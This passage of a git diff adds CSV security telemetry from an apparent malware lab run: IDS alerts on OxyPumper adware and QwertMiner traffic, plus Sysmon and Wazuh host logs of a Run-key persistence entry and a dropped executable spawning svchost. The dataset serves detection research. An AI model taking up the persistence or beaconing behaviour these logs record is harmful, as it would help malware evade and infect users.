Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49771 -> 208.95.112.1:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:55:07.500","05/30/2020-13:55:07.481035 [**] [1:2022082:3] ET POLICY External IP Lookup ip-api.com [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:49771 -> 208.95.112.1:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:55:06.500","05/30/2020-13:55:04.711107 [**] [1:2833087:2] ETPRO MALWARE Win32/QwertMiner Suspicious UA (jdlnb) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49765 -> 172.217.16.196:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:55:06.500","05/30/2020-13:55:04.711107 [**] [1:2837242:2] ETPRO ADWARE_PUP Win32/OxyPumper Adware Related Header Observed [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49765 -> 172.217.16.196:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:55:06.500","05/30/2020-13:55:04.967125 [**] [1:2837243:2] ETPRO ADWARE_PUP Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49768 -> 13.90.173.206:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:55:06.498","05/30-13:55:04.866839 [**] [1:2837243:2] ETPRO MALWARE Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49768 -> 13.90.173.206:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:55:06.498","05/30-13:55:04.966857 [**] [1:2833089:4] ETPRO MALWARE Win32/OxyPumper.Adware Receiving Payload Country Distribution Config [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 13.90.173.206:80 -> 172.16.2.2:49768","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:55:05.497","05/30-13:55:04.684569 [**] [1:2837242:3] ETPRO MALWARE Win32/OxyPumper Adware Related Header Observed [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49765 -> 172.217.16.196:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:55:05.497","05/30-13:55:04.684569 [**] [1:2833087:2] ETPRO TROJAN Win32/QwertMiner Suspicious UA (jdlnb) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49765 -> 172.217.16.196:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:55:04.497","05/30-13:55:03.262285 [**] [1:2837243:2] ETPRO MALWARE Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49764 -> 208.95.112.1:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:55:04.497","05/30-13:55:03.262285 [**] [1:2022082:1] ET POLICY External IP Lookup ip-api.com [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49764 -> 208.95.112.1:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:55:04.496","05/30-13:55:02.923444 [**] [1:2828706:1] ETPRO POLICY IP Check Domain (iplogger .org in TLS SNI) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49763 -> 88.99.66.31:443","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:55:03.496","05/30/2020-13:55:03.067891 [**] [1:2832295:1] ETPRO POLICY Possible External IP Lookup SSL Cert Observed (iplogger .com) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 88.99.66.31:443 -> 172.16.2.2:49763","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:55:03.496","05/30/2020-13:55:03.275596 [**] [1:2022082:3] ET POLICY External IP Lookup ip-api.com [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:49764 -> 208.95.112.1:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:55:03.496","05/30/2020-13:55:03.275596 [**] [1:2837243:2] ETPRO ADWARE_PUP Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49764 -> 208.95.112.1:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:55:03.495","05/30-13:55:01.915159 [**] [1:2837243:2] ETPRO MALWARE Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49761 -> 88.99.66.31:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:55:03.495","05/30/2020-13:55:03.007948 [**] [1:2828706:3] ETPRO POLICY IP Check Domain (iplogger .org in TLS SNI) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49763 -> 88.99.66.31:443","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:55:02.495","05/30/2020-13:55:01.864737 [**] [1:2828705:3] ETPRO POLICY IP Check Domain (iplogger .org in DNS Lookup) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {UDP} 172.16.2.2:60987 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:55:02.495","05/30/2020-13:55:01.936887 [**] [1:2837243:2] ETPRO ADWARE_PUP Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49761 -> 88.99.66.31:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:55:02.495","05/30-13:55:01.864737 [**] [1:2828705:1] ETPRO POLICY IP Check Domain (iplogger .org in DNS Lookup) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {UDP} 172.16.2.2:60987 -> 172.16.2.1:53","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:48:18.474","05/30/2020-13:48:10.547478 [**] [1:2833089:4] ETPRO ADWARE_PUP Win32/OxyPumper.Adware Receiving Payload Country Distribution Config [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 13.90.173.206:80 -> 172.16.2.2:49980","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:47:18.462","05/30-13:47:14.993541 [**] [1:2023883:2] ET DNS Query to a *.top domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:52409 -> 172.16.2.1:53","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:47:18.462","05/30-13:47:16.225204 [**] [1:2023882:1] ET INFO HTTP Request to a *.top domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:49989 -> 172.67.161.111:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:47:18.462","05/30-13:47:16.225204 [**] [1:2022896:4] ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49989 -> 172.67.161.111:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:47:18.462","05/30-13:47:16.225204 [**] [1:2022550:14] ET TROJAN Possible Malicious Macro DL EXE Feb 2016 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49989 -> 172.67.161.111:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:47:18.462","05/30-13:47:16.661424 [**] [1:2014819:1] ET INFO Packed Executable Download [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.67.161.111:80 -> 172.16.2.2:49989","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:47:18.462","05/30-13:47:16.661424 [**] [1:2023464:1] ET INFO Possible EXE Download From Suspicious TLD [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.67.161.111:80 -> 172.16.2.2:49989","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:47:18.462","05/30-13:47:17.213502 [**] [1:2012252:2] ET SHELLCODE Common 0a0a0a0a Heap Spray String [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 172.67.161.111:80 -> 172.16.2.2:49989","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:47:18.460","05/30/2020-13:47:14.993541 [**] [1:2023883:3] ET DNS Query to a *.top domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:52409 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:47:18.460","05/30/2020-13:47:16.661470 [**] [1:2022550:18] ET MALWARE Possible Malicious Macro DL EXE Feb 2016 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49989 -> 172.67.161.111:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:47:18.460","05/30/2020-13:47:16.661470 [**] [1:2022896:5] ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49989 -> 172.67.161.111:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:47:18.460","05/30/2020-13:47:16.661470 [**] [1:2023882:3] ET INFO HTTP Request to a *.top domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:49989 -> 172.67.161.111:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:47:18.460","05/30/2020-13:47:16.677340 [**] [1:2023464:2] ET HUNTING Possible EXE Download From Suspicious TLD [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.67.161.111:80 -> 172.16.2.2:49989","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:47:11.458","05/30-13:47:02.120295 [**] [1:2025106:3] ET INFO DNS Query for Suspicious .ml Domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:56505 -> 172.16.2.1:53","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:47:11.458","05/30-13:47:03.276983 [**] [1:2828705:1] ETPRO POLICY IP Check Domain (iplogger .org in DNS Lookup) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {UDP} 172.16.2.2:64376 -> 172.16.2.1:53","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:47:11.458","05/30-13:47:03.458144 [**] [1:2837243:2] ETPRO MALWARE Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49974 -> 88.99.66.31:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:47:11.458","05/30-13:47:03.506593 [**] [1:2828706:1] ETPRO POLICY IP Check Domain (iplogger .org in TLS SNI) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49975 -> 88.99.66.31:443","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:47:11.458","05/30-13:47:05.089239 [**] [1:2837243:2] ETPRO MALWARE Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49978 -> 208.95.112.1:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:47:11.458","05/30-13:47:05.089239 [**] [1:2022082:1] ET POLICY External IP Lookup ip-api.com [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49978 -> 208.95.112.1:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:47:11.458","05/30-13:47:05.184789 [**] [1:2837242:3] ETPRO MALWARE Win32/OxyPumper Adware Related Header Observed [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49979 -> 172.217.16.196:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:47:11.458","05/30-13:47:05.184789 [**] [1:2833087:2] ETPRO TROJAN Win32/QwertMiner Suspicious UA (jdlnb) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49979 -> 172.217.16.196:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:47:11.458","05/30-13:47:05.405775 [**] [1:2837243:2] ETPRO MALWARE Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49980 -> 13.90.173.206:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:47:11.458","05/30-13:47:05.494249 [**] [1:2833089:4] ETPRO MALWARE Win32/OxyPumper.Adware Receiving Payload Country Distribution Config [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 13.90.173.206:80 -> 172.16.2.2:49980","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:47:11.457","05/30/2020-13:47:02.120295 [**] [1:2025106:3] ET INFO DNS Query for Suspicious .ml Domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:56505 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:47:11.457","05/30/2020-13:47:03.276983 [**] [1:2828705:3] ETPRO POLICY IP Check Domain (iplogger .org in DNS Lookup) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {UDP} 172.16.2.2:64376 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:47:11.457","05/30/2020-13:47:03.476449 [**] [1:2837243:2] ETPRO ADWARE_PUP Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49974 -> 88.99.66.31:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:47:11.457","05/30/2020-13:47:03.527234 [**] [1:2828706:3] ETPRO POLICY IP Check Domain (iplogger .org in TLS SNI) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49975 -> 88.99.66.31:443","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:47:11.457","05/30/2020-13:47:03.527691 [**] [1:2832295:1] ETPRO POLICY Possible External IP Lookup SSL Cert Observed (iplogger .com) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 88.99.66.31:443 -> 172.16.2.2:49975","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:47:11.457","05/30/2020-13:47:05.102058 [**] [1:2022082:3] ET POLICY External IP Lookup ip-api.com [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:49978 -> 208.95.112.1:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:47:11.457","05/30/2020-13:47:05.102058 [**] [1:2837243:2] ETPRO ADWARE_PUP Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49978 -> 208.95.112.1:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:47:11.457","05/30/2020-13:47:05.215555 [**] [1:2833087:2] ETPRO MALWARE Win32/QwertMiner Suspicious UA (jdlnb) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49979 -> 172.217.16.196:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:47:11.457","05/30/2020-13:47:05.215555 [**] [1:2837242:2] ETPRO ADWARE_PUP Win32/OxyPumper Adware Related Header Observed [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49979 -> 172.217.16.196:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:47:11.457","05/30/2020-13:47:05.494643 [**] [1:2837243:2] ETPRO ADWARE_PUP Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49980 -> 13.90.173.206:80","/var/log/suricata/fast.log" diff --git a/data/MW_27_HIDS_3.csv b/data/MW_27_HIDS_3.csv new file mode 100644 index 0000000..23dd160 --- /dev/null +++ b/data/MW_27_HIDS_3.csv @@ -0,0 +1,102 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details" +"May 30, 2020 @ 15:36:32.956",7,"Agent event queue is 90% full.",,,,"wazuh: Agent buffer: '90%'.", +"May 30, 2020 @ 15:30:06.718",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '7fa7290c3b0e7b2d8ed5a092299db356' +New md5sum is : '7b0e21ee99623454e8d06871f064ed98' +Old sha1sum was: '27735fff26a4f9093576dfbd77d06599094d3497' +New sha1sum is : 'f63735bbc2e72216030f4e994b7c9785856a9170' +", +"May 30, 2020 @ 15:27:37.236",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '7b0e21ee99623454e8d06871f064ed98' +New md5sum is : '7fa7290c3b0e7b2d8ed5a092299db356' +Old sha1sum was: 'f63735bbc2e72216030f4e994b7c9785856a9170' +New sha1sum is : '27735fff26a4f9093576dfbd77d06599094d3497' +", +"May 30, 2020 @ 15:27:36.227",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '683769ad6be42008bb88e21c615ecf9d' +New md5sum is : 'd2abb0e472c53cbf65d10a1f2d09aa79' +Old sha1sum was: '02d42d90e46269b3dcd90d96a22e0b3108d640cc' +New sha1sum is : '940d447005e78e8bd3cb6f655847dc7810917403' +", +"May 30, 2020 @ 15:27:36.208",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '541ce0443f4bb6794b91fc8110978c38' +New md5sum is : 'e064d552ab7f45ac175a32c6fadfae16' +Old sha1sum was: '2922dab3a710730ef91616e78115b57f4ec74d4c' +New sha1sum is : '14398c675c8587716a103632fb0302df5f37982d' +", +"May 30, 2020 @ 15:27:33.501",7,"Integrity checksum changed.",,,,"File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'c6d5c466fdaab5a7ef4e81d9e5ef90d2' +New md5sum is : '6491bfbb48f449e8ef2da21bf4925908' +Old sha1sum was: '83bc06dcc92dc45d0223a09e27bb587b1d15d31a' +New sha1sum is : 'a659aa851c1408487eefa829ad359673b7fb1288' +", +"May 30, 2020 @ 15:27:31.251",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WINDOWEDSELECTCONTROL' checksum changed. +Old md5sum was: '370914f65a755a1cbfcf0c873b11feaa' +New md5sum is : '1c729912f87f9abbd1574176fc5996f7' +Old sha1sum was: 'ea4c2f8e1a1dc5de73a98dbadb5abff9297c9a4b' +New sha1sum is : '1d2094dc263dc3db258f4421536e179cfbd9cfb0' +", +"May 30, 2020 @ 15:26:26.673",7,"Integrity checksum changed.",,,,"File 'HKEY_LOCAL_MACHINE\Security\Policy\Accounts\S-1-5-32-544\Privilgs' checksum changed. +Old md5sum was: 'd2f6f5287a67de5a6a80b2063114c5df' +New md5sum is : 'c14025399795b5c4c7d63168d80274be' +Old sha1sum was: '379cd91990d35c23614e38e9359ba7a6e0774579' +New sha1sum is : '89edceaacf73401446f242269871abebc5f677ca' +", +"May 30, 2020 @ 15:26:24.267",14,"ATT&CK T1036: Suspicious Svchost Process","""Process Create: +RuleName: +UtcTime: 2020-05-30 15:26:21.034 +ProcessGuid: {df9fc3d3-7b1d-5ed2-0000-0010281f0900} +ProcessId: 5224 +Image: C:\Windows\SysWOW64\svchost.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Host Process for Windows Services +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: svchost.exe +CommandLine: svchost.exe +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-7b04-5ed2-0000-0020576e0300} +LogonId: 0x36E57 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A7296C1245EE76768D581C6330DADE06,SHA256=5BE0DE7F915BA819D4BA048DB7A2A87F6F3253FDD4865DC418181A0D6A031CAA,IMPHASH=EC10F5BE711CB724C2D4D18A3C10AD6D +ParentProcessGuid: {df9fc3d3-7b1b-5ed2-0000-00106dfa0800} +ParentProcessId: 3996 +ParentImage: C:\Users\John Williams\ccdojkiq.exe +ParentCommandLine: ""C:\Users\John Williams\ccdojkiq.exe"" ""","svchost.exe",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-30T15:26:21.042385000Z"",""eventRecordID"":""2428"",""processID"":""2148"",""threadID"":""3124"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-30 15:26:21.034\r\nProcessGuid: {df9fc3d3-7b1d-5ed2-0000-0010281f0900}\r\nProcessId: 5224\r\nImage: C:\\Windows\\SysWOW64\\svchost.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Host Process for Windows Services\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: svchost.exe\r\nCommandLine: svchost.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-7b04-5ed2-0000-0020576e0300}\r\nLogonId: 0x36E57\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A7296C1245EE76768D581C6330DADE06,SHA256=5BE0DE7F915BA819D4BA048DB7A2A87F6F3253FDD4865DC418181A0D6A031CAA,IMPHASH=EC10F5BE711CB724C2D4D18A3C10AD6D\r\nParentProcessGuid: {df9fc3d3-7b1b-5ed2-0000-00106dfa0800}\r\nParentProcessId: 3996\r\nParentImage: C:\\Users\\John Williams\\ccdojkiq.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\ccdojkiq.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-30 15:26:21.034"",""processGuid"":""{df9fc3d3-7b1d-5ed2-0000-0010281f0900}"",""processId"":""5224"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\svchost.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Host Process for Windows Services"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""svchost.exe"",""commandLine"":""svchost.exe"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-7b04-5ed2-0000-0020576e0300}"",""logonId"":""0x36e57"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A7296C1245EE76768D581C6330DADE06,SHA256=5BE0DE7F915BA819D4BA048DB7A2A87F6F3253FDD4865DC418181A0D6A031CAA,IMPHASH=EC10F5BE711CB724C2D4D18A3C10AD6D"",""parentProcessGuid"":""{df9fc3d3-7b1b-5ed2-0000-00106dfa0800}"",""parentProcessId"":""3996"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\ccdojkiq.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\ccdojkiq.exe\\\""""}}}", +"May 30, 2020 @ 15:26:08.406",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,,,, +"May 30, 2020 @ 15:25:58.595",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,,, +"May 30, 2020 @ 15:25:17.428",9,"Windows Application error event",,,,, +"May 30, 2020 @ 15:20:40.356",14,"ATT&CK T1036: Suspicious Svchost Process","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:25.552 +ProcessGuid: {df9fc3d3-b355-5ecf-0000-001097d21800} +ProcessId: 6264 +Image: C:\Windows\SysWOW64\svchost.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Host Process for Windows Services +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: svchost.exe +CommandLine: svchost.exe +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A7296C1245EE76768D581C6330DADE06,SHA256=5BE0DE7F915BA819D4BA048DB7A2A87F6F3253FDD4865DC418181A0D6A031CAA,IMPHASH=EC10F5BE711CB724C2D4D18A3C10AD6D +ParentProcessGuid: {df9fc3d3-b354-5ecf-0000-0010a2c71800} +ParentProcessId: 256 +ParentImage: C:\Users\John Williams\ccdojkiq.exe +ParentCommandLine: ""C:\Users\John Williams\ccdojkiq.exe"" /d""C:\Users\John Williams\Downloads\Program27.exe"" /e5503021000000542""","svchost.exe",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:25.555657400Z"",""eventRecordID"":""2003"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:25.552\r\nProcessGuid: {df9fc3d3-b355-5ecf-0000-001097d21800}\r\nProcessId: 6264\r\nImage: C:\\Windows\\SysWOW64\\svchost.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Host Process for Windows Services\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: svchost.exe\r\nCommandLine: svchost.exe\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A7296C1245EE76768D581C6330DADE06,SHA256=5BE0DE7F915BA819D4BA048DB7A2A87F6F3253FDD4865DC418181A0D6A031CAA,IMPHASH=EC10F5BE711CB724C2D4D18A3C10AD6D\r\nParentProcessGuid: {df9fc3d3-b354-5ecf-0000-0010a2c71800}\r\nParentProcessId: 256\r\nParentImage: C:\\Users\\John Williams\\ccdojkiq.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\ccdojkiq.exe\"" /d\""C:\\Users\\John Williams\\Downloads\\Program27.exe\"" /e5503021000000542\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:25.552"",""processGuid"":""{df9fc3d3-b355-5ecf-0000-001097d21800}"",""processId"":""6264"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\svchost.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Host Process for Windows Services"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""svchost.exe"",""commandLine"":""svchost.exe"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A7296C1245EE76768D581C6330DADE06,SHA256=5BE0DE7F915BA819D4BA048DB7A2A87F6F3253FDD4865DC418181A0D6A031CAA,IMPHASH=EC10F5BE711CB724C2D4D18A3C10AD6D"",""parentProcessGuid"":""{df9fc3d3-b354-5ecf-0000-0010a2c71800}"",""parentProcessId"":""256"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\ccdojkiq.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\ccdojkiq.exe\\\"" /d\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\Program27.exe\\\"" /e5503021000000542""}}}", +"May 30, 2020 @ 15:20:40.232",14,"ATT&CK T1060: Suspicious RUN Key from Download","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-28 12:49:24.759 +ProcessGuid: {df9fc3d3-b353-5ecf-0000-0010b8a01800} +ProcessId: 6208 +Image: C:\Users\John Williams\Downloads\Program27.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\mxyxziig +Details: ""C:\Users\John 